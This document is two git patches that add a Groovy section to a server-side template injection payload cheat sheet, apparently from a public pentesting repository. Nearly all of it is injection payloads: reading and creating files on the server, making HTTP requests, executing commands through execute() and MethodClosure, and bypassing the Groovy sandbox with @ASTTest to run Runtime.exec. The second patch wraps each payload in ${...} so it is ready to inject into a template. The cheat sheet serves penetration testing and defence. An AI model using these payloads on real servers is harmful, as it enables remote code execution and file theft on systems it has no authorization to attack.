From 3db4d04467507e8ab2bca719c5ca20bf6b6ca8e2 Mon Sep 17 00:00:00 2001 From: 0x-nope Date: Fri, 4 Mar 2022 17:39:28 +0100 Subject: [PATCH 1/2] added Groovy EL section --- Server Side Template Injection/README.md | 56 ++++++++++++++++++++++++ 1 file changed, 56 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index b70b1e3..94f00d7 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -15,6 +15,12 @@ * [Freemarker](#freemarker) * [Basic injection](#freemarker---basic-injection) * [Code execution](#freemarker---code-execution) +* [Groovy](#groovy) + * [Basic injection](#groovy---basic-injection) + * [Read/Create file](#groovy---read-and-create-file) + * [HTTP Request](#groovy---http-request) + * [Command execution](#groovy---command-execution) + * [Sandbox bypass](#groovy---sandbox-bypass) * [Handlebars](#handlebars) * [Jade / Codepen](#jade--codepen) * [Java](#java) @@ -184,6 +190,56 @@ ${dwf.newInstance(ec,null)("id")} --- +## Groovy + +[Official website](https://groovy-lang.org/) + + +### Groovy - Basic injection + +Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection. + + +### Groovy - Read and create File + +```groovy +String x = new File('c:/windows/notepad.exe').text +String x = new File('/path/to/file').getText('UTF-8') +new File("C:\Temp\FileName.txt").createNewFile(); +``` + +### Groovy - HTTP request: + + +```groovy +"http://www.google.com".toURL().text +new URL("http://www.google.com").getText() +``` + +### Groovy - Command Execution + +```groovy +"calc.exe".exec() +"calc.exe".execute() +this.evaluate("9*9") //(this is a Script) +new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call() +``` + +### Groovy - Sandbox Bypass + +```groovy +@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")}) +def x +``` + +or + +```groovy +new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") +``` + +--- + ## Handlebars [Official website](https://handlebarsjs.com/) From 59cae2ddb4d2e428ecc1f41194734dc6412244bf Mon Sep 17 00:00:00 2001 From: 0x-nope Date: Wed, 20 Apr 2022 09:42:58 +0200 Subject: [PATCH 2/2] Update README.md --- Server Side Template Injection/README.md | 27 +++++++++++------------- 1 file changed, 12 insertions(+), 15 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 94f00d7..21f76c1 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -194,48 +194,45 @@ ${dwf.newInstance(ec,null)("id")} [Official website](https://groovy-lang.org/) - ### Groovy - Basic injection Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection. - ### Groovy - Read and create File ```groovy -String x = new File('c:/windows/notepad.exe').text -String x = new File('/path/to/file').getText('UTF-8') -new File("C:\Temp\FileName.txt").createNewFile(); +${String x = new File('c:/windows/notepad.exe').text} +${String x = new File('/path/to/file').getText('UTF-8')} +${new File("C:\Temp\FileName.txt").createNewFile();} ``` ### Groovy - HTTP request: - ```groovy -"http://www.google.com".toURL().text -new URL("http://www.google.com").getText() +${"http://www.google.com".toURL().text} +${new URL("http://www.google.com").getText()} ``` ### Groovy - Command Execution ```groovy -"calc.exe".exec() -"calc.exe".execute() -this.evaluate("9*9") //(this is a Script) -new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call() +${"calc.exe".exec()} +${"calc.exe".execute()} +${this.evaluate("9*9") //(this is a Script class)} +${new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()} ``` ### Groovy - Sandbox Bypass ```groovy -@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")}) -def x +${ @ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")}) +def x } ``` or ```groovy -new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") +${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") } ``` ---